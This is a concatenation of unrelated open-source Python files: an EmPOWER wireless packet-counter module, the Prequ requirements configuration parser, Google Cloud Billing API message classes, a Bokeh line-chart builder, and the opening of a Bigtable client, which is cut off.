h2o.unit_main()
|
|
#!/usr/bin/env python3
#
# Copyright (c) 2016 Roberto Riggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Common counters module."""
from construct import UBInt8
from construct import Bytes
from construct import Sequence
from construct import Container
from construct import Struct
from construct import UBInt16
from construct import UBInt32
from construct import Array
from empower.datatypes.etheraddress import EtherAddress
from empower.lvapp.lvappserver import ModuleLVAPPWorker
from empower.core.module import Module
from empower.core.lvap import LVAP
from empower.lvapp import PT_VERSION
from empower.main import RUNTIME
PT_STATS_REQUEST = 0x17
PT_STATS_RESPONSE = 0x18
STATS = Sequence("stats", UBInt16("bytes"), UBInt32("count"))
STATS_REQUEST = Struct("stats_request", UBInt8("version"),
UBInt8("type"),
UBInt16("length"),
UBInt32("seq"),
UBInt32("module_id"),
Bytes("sta", 6))
STATS_RESPONSE = \
Struct("stats_response", UBInt8("version"),
UBInt8("type"),
UBInt16("length"),
UBInt32("seq"),
UBInt32("module_id"),
Bytes("wtp", 6),
Bytes("sta", 6),
UBInt16("nb_tx"),
UBInt16("nb_rx"),
Array(lambda ctx: ctx.nb_tx + ctx.nb_rx, STATS))
class Counters(Module):
""" PacketsCounter object. """
MODULE_NAME = "counters"
REQUIRED = ['module_type', 'worker', 'tenant_id', 'lvap']
def __init__(self):
Module.__init__(self)
# parameters
self._lvap = None
self._bins = [8192]
# data structures
self.tx_packets = []
self.rx_packets = []
self.tx_bytes = []
self.rx_bytes = []
def __eq__(self, other):
return super().__eq__(other) and \
self.lvap == other.lvap and \
self.bins == other.bins
@property
def lvap(self):
"""Return the LVAP Address."""
return self._lvap
@lvap.setter
def lvap(self, value):
"""Set the LVAP Address."""
self._lvap = EtherAddress(value)
@property
def bins(self):
""" Return the lvaps list """
return self._bins
@bins.setter
def bins(self, bins):
""" Set the distribution bins. Default is [ 8192 ]. """
if len(bins) > 0:
if [x for x in bins if isinstance(x, int)] != bins:
raise ValueError("bins values must be integers")
if sorted(bins) != bins:
raise ValueError("bins must be monotonically increasing")
if sorted(set(bins)) != sorted(bins):
raise ValueError("bins values must not contain duplicates")
if [x for x in bins if x > 0] != bins:
raise ValueError("bins values must be positive")
self._bins = bins
def to_dict(self):
""" Return a JSON-serializable dictionary representing the Stats """
out = super().to_dict()
out['bins'] = self.bins
out['lvap'] = self.lvap
out['tx_bytes'] = self.tx_bytes
out['rx_bytes'] = self.tx_bytes
out['tx_packets'] = self.tx_packets
out['rx_packets'] = self.tx_packets
return out
def run_once(self):
""" Send out stats request. """
if self.tenant_id not in RUNTIME.tenants:
self.log.info("Tenant %s not found", self.tenant_id)
self.unload()
return
tenant = RUNTIME.tenants[self.tenant_id]
if self.lvap not in tenant.lvaps:
self.log.info("LVAP %s not found", self.lvap)
return
lvap = tenant.lvaps[self.lvap]
if not lvap.wtp.connection or lvap.wtp.connection.stream.closed():
self.log.info("WTP %s not connected", lvap.wtp.addr)
return
stats_req = Container(version=PT_VERSION,
type=PT_STATS_REQUEST,
length=18,
seq=lvap.wtp.seq,
module_id=self.module_id,
sta=lvap.addr.to_raw())
self.log.info("Sending %s request to %s @ %s (id=%u)",
self.MODULE_NAME, lvap.addr, lvap.wtp.addr,
self.module_id)
msg = STATS_REQUEST.build(stats_req)
lvap.wtp.connection.stream.write(msg)
def fill_bytes_samples(self, data):
""" Compute samples.
Samples are in the following format (after ordering):
[[60, 3], [66, 2], [74, 1], [98, 40], [167, 2], [209, 2], [1466, 1762]]
Each 2-tuple has format [ size, count ] where count is the number of
size-long (bytes, including the Ethernet 2 header) TX/RX by the LVAP.
"""
samples = sorted(data, key=lambda entry: entry[0])
out = [0] * len(self.bins)
for entry in samples:
if len(entry) == 0:
continue
size = entry[0]
count = entry[1]
for i in range(0, len(self.bins)):
if size <= self.bins[i]:
out[i] = out[i] + size * count
break
return out
def fill_packets_samples(self, data):
""" Compute samples.
Samples are in the following format (after ordering):
[[60, 3], [66, 2], [74, 1], [98, 40], [167, 2], [209, 2], [1466, 1762]]
Each 2-tuple has format [ size, count ] where count is the number of
size-long (bytes, including the Ethernet 2 header) TX/RX by the LVAP.
"""
samples = sorted(data, key=lambda entry: entry[0])
out = [0] * len(self.bins)
for entry in samples:
if len(entry) == 0:
continue
size = entry[0]
count = entry[1]
for i in range(0, len(self.bins)):
if size <= self.bins[i]:
out[i] = out[i] + count
break
return out
def handle_response(self, response):
"""Handle an incoming STATS_RESPONSE message.
Args:
stats, a STATS_RESPONSE message
Returns:
None
"""
# update this object
tx_samples = response.stats[0:response.nb_tx]
rx_samples = response.stats[response.nb_tx:-1]
self.tx_bytes = self.fill_bytes_samples(tx_samples)
self.rx_bytes = self.fill_bytes_samples(rx_samples)
self.tx_packets = self.fill_packets_samples(tx_samples)
self.rx_packets = self.fill_packets_samples(rx_samples)
# call callback
self.handle_callback(self)
class CountersWorker(ModuleLVAPPWorker):
"""Counter worker."""
pass
def counters(**kwargs):
"""Create a new module."""
worker = RUNTIME.components[CountersWorker.__module__]
return worker.add_module(**kwargs)
def bound_counters(self, **kwargs):
"""Create a new module (app version)."""
kwargs['tenant_id'] = self.tenant.tenant_id
kwargs['lvap'] = self.addr
return counters(**kwargs)
setattr(LVAP, Counters.MODULE_NAME, bound_counters)
def launch():
""" Initialize the module. """
return CountersWorker(Counters, PT_STATS_RESPONSE, STATS_RESPONSE)
|
|
"""
Prequ configuration file definition and parsing.
"""
from __future__ import unicode_literals
import io
import os
import re
from collections import defaultdict
from contextlib import contextmanager
from glob import glob
from .ini_parser import bool_or_auto, parse_ini
from .repositories.pypi import PyPIRepository
DEFAULT_INDEX_URL = PyPIRepository.DEFAULT_INDEX_URL
text = type('')
class PrequConfiguration(object):
"""
Prequ configuration specification.
Prequ configuration defines the source requirement set(s) and some
options to control aspects of the requirements files generation.
Each source requirement set is a list of package names with an
optional version specifier. It is possible to have several source
requirement sets defined. A single requirements file will be
generated from each set. These sets are addressed by a label which
determines the output file name. Label "base" is the default and
its output is "requirements.txt". Other output files are named
"requirements-{label}.txt" by their labels.
"""
fields = [
('options.annotate', bool_or_auto),
('options.generate_hashes', bool_or_auto),
('options.header', bool_or_auto),
('options.index_url', text),
('options.extra_index_urls', [text]),
('options.trusted_hosts', [text]),
('options.wheel_dir', text),
('options.wheel_sources', {text: text}),
('requirements', {text: text}),
]
@classmethod
def from_directory(cls, directory):
"""
Get Prequ configuration from a directory.
Reads the Prequ configuration file(s) in the directory and
parses it/them to a PrequConfiguration object. Supported
configuration files are:
* setup.cfg, [prequ] section
* requirements.in and requirements-*.in
If both setup.cfg and requirements*.in files exist, then options
and source requirement sets specified in the setup.cfg are
merged with the source requirement sets defined by the in-files.
:type directory: str
:rtype: PrequConfiguration
"""
def path(filename):
return os.path.join(directory, filename)
in_files = (
glob(path('requirements.in')) +
glob(path('requirements-*.in')))
in_requirements = cls._read_in_files(in_files)
setup_cfg = path('setup.cfg')
conf_data = (cls._read_ini_file(setup_cfg)
if os.path.exists(setup_cfg) else None) or {}
if in_requirements:
conf_data.setdefault('requirements', {}).update(in_requirements)
if conf_data:
return cls.from_dict(conf_data)
raise NoPrequConfigurationFound(
'Cannot find Prequ configuration. '
'Add [prequ] section to your setup.cfg.')
@classmethod
def from_ini(cls, fileobj, section_name='prequ'):
conf_data = cls._read_ini_file(fileobj, section_name)
return cls.from_dict(conf_data) if conf_data else None
@classmethod
def _read_ini_file(cls, fileobj, section_name='prequ'):
field_specs = {
key.split('options.', 1)[1]: value
for (key, value) in cls.fields
if key.startswith('options.')
}
with _get_fileobj(fileobj, 'rt', 'utf-8') as fp:
data = parse_ini(fp, field_specs, section_name=section_name)
if data is None:
return None
opts = {}
reqs = {}
for (key, value) in data.items():
if key == 'requirements':
reqs['base'] = value
elif key.startswith('requirements-'):
reqs[key.split('requirements-', 1)[1]] = value
else:
opts[key] = value
return {'options': opts, 'requirements': reqs}
@classmethod
def from_in_files(cls, *filenames):
return cls.from_dict({'requirements': cls._read_in_files(filenames)})
@classmethod
def _read_in_files(cls, filenames):
reqs = {}
for filepath in filenames:
fn = os.path.basename(filepath)
if fn == 'requirements.in':
label = 'base'
elif fn.startswith('requirements-') and fn.endswith('.in'):
label = fn.split('requirements-', 1)[1].rsplit('.in', 1)[0]
else:
raise InvalidPrequConfiguration(
'Invalid in-file name: {}'.format(fn))
with io.open(filepath, 'rt', encoding='utf-8') as fp:
reqs[label] = fp.read()
return reqs
@classmethod
def from_dict(cls, conf_data):
errors = get_data_errors(conf_data, cls.fields)
if errors:
raise InvalidPrequConfiguration(
'Errors in Prequ configuration: {}'.format(', '.join(errors)))
input_reqs = conf_data['requirements']
(requirement_sets, extra_opts) = parse_input_requirements(input_reqs)
options = conf_data.get('options', {})
options.update(extra_opts)
return cls(requirement_sets, **options)
def __init__(self, requirement_sets, **kwargs):
assert isinstance(requirement_sets, dict)
assert all(isinstance(x, text) for x in requirement_sets.values())
self.requirement_sets = requirement_sets
self.annotate = kwargs.pop('annotate', 'auto')
self.generate_hashes = kwargs.pop('generate_hashes', 'auto')
self.header = kwargs.pop('header', 'auto')
self.index_url = kwargs.pop('index_url', DEFAULT_INDEX_URL)
self.extra_index_urls = kwargs.pop('extra_index_urls', [])
self.trusted_hosts = kwargs.pop('trusted_hosts', [])
self.wheel_dir = kwargs.pop('wheel_dir', None)
#: Wheel source map, format: {wheel_src_name: url_template}
self.wheel_sources = kwargs.pop('wheel_sources', {})
#: List of wheels to build, format [(wheel_src_name, pkg, ver)]
self.wheels_to_build = kwargs.pop('wheels_to_build', [])
@property
def labels(self):
def sort_key(label):
return (0, label) if label == 'base' else (1, label)
return sorted(self.requirement_sets.keys(), key=sort_key)
def get_output_file_for(self, label):
"""
Get output file name for a requirement set.
:type label: text
:rtype: text
"""
return (
'requirements.txt' if label == 'base' else
'requirements-{}.txt'.format(label))
def get_requirements_in_for(self, label):
"""
Get requirements.in file content for a requirement set.
:type label: text
:rtype: text
"""
constraint_line = (
'-c {}\n'.format(self.get_output_file_for('base'))
if label != 'base' and 'base' in self.requirement_sets
else '')
return constraint_line + self.requirement_sets[label]
def get_wheels_to_build(self):
for (wheel_src_name, pkg, ver) in self.wheels_to_build:
url_template = self.wheel_sources.get(wheel_src_name)
if not url_template:
raise UnknownWheelSource(wheel_src_name)
url = url_template.format(pkg=pkg, ver=ver)
yield (pkg, ver, url)
def get_prequ_compile_options(self):
options = {
'annotate': self._detect(self.annotate, ' # via '),
'header': self._detect(self.header, 'generated by ', True),
'generate_hashes': self._detect(self.generate_hashes, ' --hash='),
}
if self.index_url != DEFAULT_INDEX_URL:
options['index_url'] = self.index_url
if self.extra_index_urls:
options['extra_index_url'] = self.extra_index_urls
if self.trusted_hosts:
options['trusted_host'] = self.trusted_hosts
if self.wheel_dir:
options['find_links'] = [self.wheel_dir]
return options
def _detect(self, value, detector_text, default_if_no_files=False):
"""
Detect value for bool_or_auto variable.
"""
if value == 'auto':
files = self._get_existing_output_files()
if not files:
return default_if_no_files
return _is_text_in_any_file(detector_text, files)
return value
def _get_existing_output_files(self):
output_files = (self.get_output_file_for(x) for x in self.labels)
return [x for x in output_files if os.path.exists(x)]
def get_pip_options(self):
options = []
if self.index_url != DEFAULT_INDEX_URL:
options.append('--index-url {}\n'.format(self.index_url))
for extra_index_url in self.extra_index_urls:
options.append('--extra-index-url {}\n'.format(extra_index_url))
for trusted_host in self.trusted_hosts:
options.append('--trusted-host {}\n'.format(trusted_host))
if self.wheel_dir:
options.append('--find-links {}\n'.format(self.wheel_dir))
return options
@contextmanager
def _get_fileobj(file_or_filename, mode='rb', encoding=None):
if isinstance(file_or_filename, (bytes, type(u''))):
with io.open(file_or_filename, mode, encoding=encoding) as fp:
yield fp
else:
yield file_or_filename
def _is_text_in_any_file(text, files):
encoded_text = text.encode('utf-8')
for filename in files:
with open(filename, 'rb') as fp:
if encoded_text in fp.read():
return True
return False
def get_data_errors(data, field_types):
return (
list(_get_key_errors(data, field_types)) +
list(_get_type_errors(data, field_types)))
def _get_key_errors(data, field_types):
top_level_keys = {x.split('.', 1)[0] for (x, _) in field_types}
second_level_keys_map = defaultdict(set)
for (fieldspec, _) in field_types:
if '.' in fieldspec:
(key, subkey) = fieldspec.split('.', 2)[:2]
second_level_keys_map[key].add(subkey)
for (key, value) in data.items():
if key not in top_level_keys:
yield 'Unknown key name: "{}"'.format(key)
if isinstance(value, dict) and key in second_level_keys_map:
second_level_keys = second_level_keys_map[key]
for (subkey, subvalue) in value.items():
if subkey not in second_level_keys:
yield 'Unknown key name: "{}.{}"'.format(key, subkey)
def _get_type_errors(data, field_types):
unspecified = object()
for (fieldspec, typespec) in field_types:
value = data
keypath = []
for key in fieldspec.split('.'):
if value is not unspecified:
if isinstance(value, dict):
value = value.get(key, unspecified)
else:
yield 'Field "{}" should be dict'.format('.'.join(keypath))
value = unspecified
keypath.append(key)
if value is unspecified:
continue
error = _get_type_error(value, typespec, fieldspec)
if error:
yield error
def _get_type_error(value, typespec, fieldspec):
if typespec == bool_or_auto:
typespec = (bool if value != 'auto' else text)
return _get_type_error_for_basic_type(value, typespec, fieldspec)
def _get_type_error_for_basic_type(value, typespec, fieldspec):
if isinstance(typespec, list):
if not isinstance(value, list):
return 'Field "{}" should be list'.format(fieldspec)
itemtype = typespec[0]
if not all(isinstance(x, itemtype) for x in value):
typename = itemtype.__name__
return 'Values of "{}" should be {}'.format(fieldspec, typename)
elif isinstance(typespec, dict):
if not isinstance(value, dict):
return 'Field "{}" should be dict'.format(fieldspec)
(keytype, valuetype) = list(typespec.items())[0]
if not all(isinstance(x, keytype) for x in value.keys()):
keytypename = keytype.__name__
return 'Keys of "{}" should be {}'.format(fieldspec, keytypename)
if not all(isinstance(x, valuetype) for x in value.values()):
valtypename = valuetype.__name__
return 'Values of "{}" should be {}'.format(fieldspec, valtypename)
else:
if not isinstance(typespec, type):
raise ValueError('Invalid type specifier for "{}": {!r}'
.format(fieldspec, typespec))
if not isinstance(value, typespec):
typename = typespec.__name__
return 'Field "{}" should be {}'.format(fieldspec, typename)
def parse_input_requirements(input_requirements):
extra_opts = {}
requirement_sets = {}
for (label, req_data) in input_requirements.items():
(requirement_set, opts) = _parse_req_data(req_data)
_merge_update_dict(extra_opts, opts)
requirement_sets[label] = requirement_set
return (requirement_sets, extra_opts)
def _parse_req_data(req_data):
result_lines = []
wheels_to_build = [] # [(wheel_src_name, pkg, ver)]
for line in req_data.splitlines():
match = WHEEL_LINE_RX.match(line)
if match:
(wheel_data, req_line) = _parse_wheel_match(
line, **match.groupdict())
wheels_to_build.append(wheel_data)
result_lines.append(req_line)
else:
result_lines.append(line)
return ('\n'.join(result_lines), {'wheels_to_build': wheels_to_build})
WHEEL_LINE_RX = re.compile(
r'^\s*(?P<pkg>(\w|-)+)(?P<verspec>\S*)\s+'
r'\(\s*wheel from \s*(?P<wheel_src_name>\S+)\)$')
def _parse_wheel_match(line, pkg, verspec, wheel_src_name):
if not verspec.startswith('=='):
raise InvalidPrequConfiguration(
'Wheel lines must use "==" version specifier: {}'.format(line))
ver = verspec[2:]
wheel_data = (wheel_src_name, pkg, ver)
req_line = pkg + verspec
return (wheel_data, req_line)
def _merge_update_dict(dest_dict, src_dict):
for (key, value) in src_dict.items():
if isinstance(value, dict):
_merge_update_dict(dest_dict.setdefault(key, {}), value)
elif isinstance(value, list):
dest_dict[key] = dest_dict.get(key, []) + value
elif isinstance(value, set):
dest_dict[key] = dest_dict.get(key, set()) | value
else:
dest_dict[key] = value
class Error(Exception):
pass
class NoPrequConfigurationFound(Error):
pass
class InvalidPrequConfiguration(Error):
pass
class UnknownWheelSource(Error):
def __init__(self, name):
msg = 'No URL template defined for "{}"'.format(name)
super(UnknownWheelSource, self).__init__(msg)
|
|
"""Generated message classes for cloudbilling version v1.
Allows developers to manage billing for their Google Cloud Platform projects
programmatically.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'cloudbilling'
class BillingAccount(_messages.Message):
"""A billing account in [Google Cloud
Console](https://console.cloud.google.com/). You can assign a billing
account to one or more projects.
Fields:
displayName: The display name given to the billing account, such as `My
Billing Account`. This name is displayed in the Google Cloud Console.
name: The resource name of the billing account. The resource name has the
form `billingAccounts/{billing_account_id}`. For example,
`billingAccounts/012345-567890-ABCDEF` would be the resource name for
billing account `012345-567890-ABCDEF`.
open: True if the billing account is open, and will therefore be charged
for any usage on associated projects. False if the billing account is
closed, and therefore projects associated with it will be unable to use
paid services.
"""
displayName = _messages.StringField(1)
name = _messages.StringField(2)
open = _messages.BooleanField(3)
class CloudbillingBillingAccountsGetRequest(_messages.Message):
"""A CloudbillingBillingAccountsGetRequest object.
Fields:
name: The resource name of the billing account to retrieve. For example,
`billingAccounts/012345-567890-ABCDEF`.
"""
name = _messages.StringField(1, required=True)
class CloudbillingBillingAccountsListRequest(_messages.Message):
"""A CloudbillingBillingAccountsListRequest object.
Fields:
pageSize: Requested page size. The maximum page size is 100; this is also
the default.
pageToken: A token identifying a page of results to return. This should be
a `next_page_token` value returned from a previous `ListBillingAccounts`
call. If unspecified, the first page of results is returned.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
class CloudbillingBillingAccountsProjectsListRequest(_messages.Message):
"""A CloudbillingBillingAccountsProjectsListRequest object.
Fields:
name: The resource name of the billing account associated with the
projects that you want to list. For example,
`billingAccounts/012345-567890-ABCDEF`.
pageSize: Requested page size. The maximum page size is 100; this is also
the default.
pageToken: A token identifying a page of results to be returned. This
should be a `next_page_token` value returned from a previous
`ListProjectBillingInfo` call. If unspecified, the first page of results
is returned.
"""
name = _messages.StringField(1, required=True)
pageSize = _messages.IntegerField(2, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(3)
class CloudbillingProjectsGetBillingInfoRequest(_messages.Message):
"""A CloudbillingProjectsGetBillingInfoRequest object.
Fields:
name: The resource name of the project for which billing information is
retrieved. For example, `projects/tokyo-rain-123`.
"""
name = _messages.StringField(1, required=True)
class CloudbillingProjectsUpdateBillingInfoRequest(_messages.Message):
"""A CloudbillingProjectsUpdateBillingInfoRequest object.
Fields:
name: The resource name of the project associated with the billing
information that you want to update. For example, `projects/tokyo-
rain-123`.
projectBillingInfo: A ProjectBillingInfo resource to be passed as the
request body.
"""
name = _messages.StringField(1, required=True)
projectBillingInfo = _messages.MessageField('ProjectBillingInfo', 2)
class ListBillingAccountsResponse(_messages.Message):
"""Response message for `ListBillingAccounts`.
Fields:
billingAccounts: A list of billing accounts.
nextPageToken: A token to retrieve the next page of results. To retrieve
the next page, call `ListBillingAccounts` again with the `page_token`
field set to this value. This field is empty if there are no more
results to retrieve.
"""
billingAccounts = _messages.MessageField('BillingAccount', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class ListProjectBillingInfoResponse(_messages.Message):
"""Request message for `ListProjectBillingInfoResponse`.
Fields:
nextPageToken: A token to retrieve the next page of results. To retrieve
the next page, call `ListProjectBillingInfo` again with the `page_token`
field set to this value. This field is empty if there are no more
results to retrieve.
projectBillingInfo: A list of `ProjectBillingInfo` resources representing
the projects associated with the billing account.
"""
nextPageToken = _messages.StringField(1)
projectBillingInfo = _messages.MessageField('ProjectBillingInfo', 2, repeated=True)
class ProjectBillingInfo(_messages.Message):
"""Encapsulation of billing information for a Cloud Console project. A
project has at most one associated billing account at a time (but a billing
account can be assigned to multiple projects).
Fields:
billingAccountName: The resource name of the billing account associated
with the project, if any. For example,
`billingAccounts/012345-567890-ABCDEF`.
billingEnabled: True if the project is associated with an open billing
account, to which usage on the project is charged. False if the project
is associated with a closed billing account, or no billing account at
all, and therefore cannot use paid services. This field is read-only.
name: The resource name for the `ProjectBillingInfo`; has the form
`projects/{project_id}/billingInfo`. For example, the resource name for
the billing information for project `tokyo-rain-123` would be `projects
/tokyo-rain-123/billingInfo`. This field is read-only.
projectId: The ID of the project that this `ProjectBillingInfo`
represents, such as `tokyo-rain-123`. This is a convenience field so
that you don't need to parse the `name` field to obtain a project ID.
This field is read-only.
"""
billingAccountName = _messages.StringField(1)
billingEnabled = _messages.BooleanField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
class StandardQueryParameters(_messages.Message):
"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
bearer_token: OAuth bearer token.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
pp: Pretty-print response.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json')
bearer_token = _messages.StringField(4)
callback = _messages.StringField(5)
fields = _messages.StringField(6)
key = _messages.StringField(7)
oauth_token = _messages.StringField(8)
pp = _messages.BooleanField(9, default=True)
prettyPrint = _messages.BooleanField(10, default=True)
quotaUser = _messages.StringField(11)
trace = _messages.StringField(12)
uploadType = _messages.StringField(13)
upload_protocol = _messages.StringField(14)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv',
package=u'cloudbilling')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1',
package=u'cloudbilling')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2',
package=u'cloudbilling')
|
|
"""This is the Bokeh charts interface. It gives you a high level API to build
complex plot is a simple way.
This is the Line class which lets you build your Line charts just
passing the arguments to the Chart class and calling the proper functions.
"""
# -----------------------------------------------------------------------------
# Copyright (c) 2012 - 2014, Continuum Analytics, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
from __future__ import absolute_import
from six import iteritems
from itertools import chain
from ..builder import XYBuilder, create_and_build
from ..glyphs import LineGlyph, PointGlyph
from ..attributes import DashAttr, ColorAttr, MarkerAttr
from ..data_source import NumericalColumnsAssigner
from ...models.sources import ColumnDataSource
from ...properties import Bool, String, List
from ..operations import Stack, Dodge
# -----------------------------------------------------------------------------
# Classes and functions
# -----------------------------------------------------------------------------
def Line(data=None, x=None, y=None, **kws):
""" Create a line chart using :class:`LineBuilder <bokeh.charts.builders.line_builder.LineBuilder>` to
render the glyphs.
The line chart is typically is used with column oriented data, where each column
contains comparable measurements and the column names are treated as a categorical
variable for differentiating the measurement values. One of the columns can be used as
an index for either the x or y axis.
.. note::
Only the x or y axis can display multiple variables, while the other is used
as an index.
Args:
data (list(list), numpy.ndarray, pandas.DataFrame, list(pd.Series)): a 2d data
source with columns of data for each line.
x (str or list(str), optional): specifies variable(s) to use for x axis
y (str or list(str), optional): specifies variable(s) to use for y axis
In addition the the parameters specific to this chart,
:ref:`userguide_charts_defaults` are also accepted as keyword parameters.
.. note::
This chart type differs on input types as compared to other charts,
due to the way that line charts typically are plotting labeled series. For
example, a column for AAPL stock prices over time. Another way this could be
plotted is to have a DataFrame with a column of `stock_label` and columns of
`price`, which is the stacked format. Both should be supported, but the former
is the expected one. Internally, the latter format is being derived.
Returns:
:class:`Chart`: includes glyph renderers that generate the lines
Examples:
.. bokeh-plot::
:source-position: above
import numpy as np
from bokeh.charts import Line, output_file, show
# (dict, OrderedDict, lists, arrays and DataFrames are valid inputs)
xyvalues = np.array([[2, 3, 7, 5, 26], [12, 33, 47, 15, 126], [22, 43, 10, 25, 26]])
line = Line(xyvalues, title="line", legend="top_left", ylabel='Languages')
output_file('line.html')
show(line)
"""
kws['x'] = x
kws['y'] = y
return create_and_build(LineBuilder, data, **kws)
class LineBuilder(XYBuilder):
"""This is the Line class and it is in charge of plotting
Line charts in an easy and intuitive way.
Essentially, we provide a way to ingest the data, make the proper
calculations and push the references into a source object.
We additionally make calculations for the ranges.
And finally add the needed lines taking the references from the source.
"""
series_names = List(String, help="""Names that represent the items being plotted.""")
stack = Bool(default=False)
default_attributes = {'color': ColorAttr(),
'dash': DashAttr(),
'marker': MarkerAttr()}
dimensions = ['y', 'x']
column_selector = NumericalColumnsAssigner
glyph = LineGlyph
@property
def measures(self):
if isinstance(self.y.selection, list):
return self.y.selection
elif isinstance(self.x.selection, list):
return self.x.selection
else:
return None
@property
def measure_input(self):
return isinstance(self.y.selection, list) or isinstance(self.x.selection, list)
@property
def stack_flags(self):
# Check if we stack measurements and by which attributes
# This happens if we used the same series labels for dimensions as attributes
return {k: self.attr_measurement(k) for k in list(
self.attributes.keys())}
def get_id_cols(self, stack_flags):
# collect the other columns used as identifiers, that aren't a measurement name
id_cols = [self.attributes[attr].columns
for attr, stack in iteritems(stack_flags) if not stack and
self.attributes[attr].columns != self.measures and
self.attributes[attr].columns is not None]
return list(chain.from_iterable(id_cols))
def setup(self):
"""Handle input options that require transforming data and/or user selections."""
# handle special case of inputs as measures
if self.measure_input:
stack_flags = self.stack_flags
id_cols = self.get_id_cols(stack_flags)
# if we have measures input, we need to stack by something, set default
if all(attr is False for attr in list(stack_flags.values())):
stack_flags['color'] = True
# stack the measurement dimension while keeping id columns
self._stack_measures(ids=id_cols)
# set the attributes to key off of the name of the stacked measurement
source = ColumnDataSource(self._data.df)
for attr_name, stack_flag in iteritems(stack_flags):
if stack_flags[attr_name]:
default_attr = self.attributes[attr_name]
default_attr.setup(columns='series', data=source)
# Handle when to use special column names
if self.x.selection is None and self.y.selection is not None:
self.x.selection = 'index'
elif self.x.selection is not None and self.y.selection is None:
self.y.selection = 'index'
def attr_measurement(self, attr_name):
"""Detect if the attribute has been given measurement columns."""
cols = self.attributes[attr_name].columns
return (cols is not None and (cols == self.y.selection or
cols == self.x.selection))
def set_series(self, col_name):
series = self._data.df[col_name].drop_duplicates().tolist()
series = [str(item) for item in series]
self.series_names = series
def _stack_measures(self, ids, var_name='series'):
"""Stack data and keep the ids columns.
Args:
ids (list(str)): the column names that describe the measures
"""
if isinstance(self.y.selection, list):
dim = 'y'
if self.x.selection is not None:
ids.append(self.x.selection)
else:
dim = 'x'
if self.y.selection is not None:
ids.append(self.y.selection)
if len(ids) == 0:
ids = None
dim_prop = getattr(self, dim)
# transform our data by stacking the measurements into one column
self._data.stack_measures(measures=dim_prop.selection, ids=ids,
var_name=var_name)
# update our dimension with the updated data
dim_prop.set_data(self._data)
self.set_series('series')
def get_builder_attr(self):
attrs = self.properties()
return {attr: getattr(self, attr) for attr in attrs
if attr in self.glyph.properties()}
def yield_renderers(self):
build_attr = self.get_builder_attr()
# get the list of builder attributes and only pass them on if glyph supports
attrs = list(self.attributes.keys())
attrs = [attr for attr in attrs if attr in self.glyph.properties()]
for group in self._data.groupby(**self.attributes):
group_kwargs = self.get_group_kwargs(group, attrs)
group_kwargs.update(build_attr)
glyph = self.glyph(x=group.get_values(self.x.selection),
y=group.get_values(self.y.selection),
**group_kwargs)
# dash=group['dash']
# save reference to composite glyph
self.add_glyph(group, glyph)
# yield each renderer produced by composite glyph
for renderer in glyph.renderers:
yield renderer
Stack().apply(self.comp_glyphs)
Dodge().apply(self.comp_glyphs)
class PointSeriesBuilder(LineBuilder):
glyph = PointGlyph
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.bigtable.v2 Bigtable API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.path_template
import grpc
from google.cloud.bigtable_v2.gapic import bigtable_client_config
from google.cloud.bigtable_v2.gapic.transports import bigtable_grpc_transport
from google.cloud.bigtable_v2.proto import bigtable_pb2
from google.cloud.bigtable_v2.proto import bigtable_pb2_grpc
from google.cloud.bigtable_v2.proto import data_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-bigtable").version
class BigtableClient(object):
"""Service for reading from and writing to existing Bigtable tables."""
SERVICE_ADDRESS = "bigtable.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
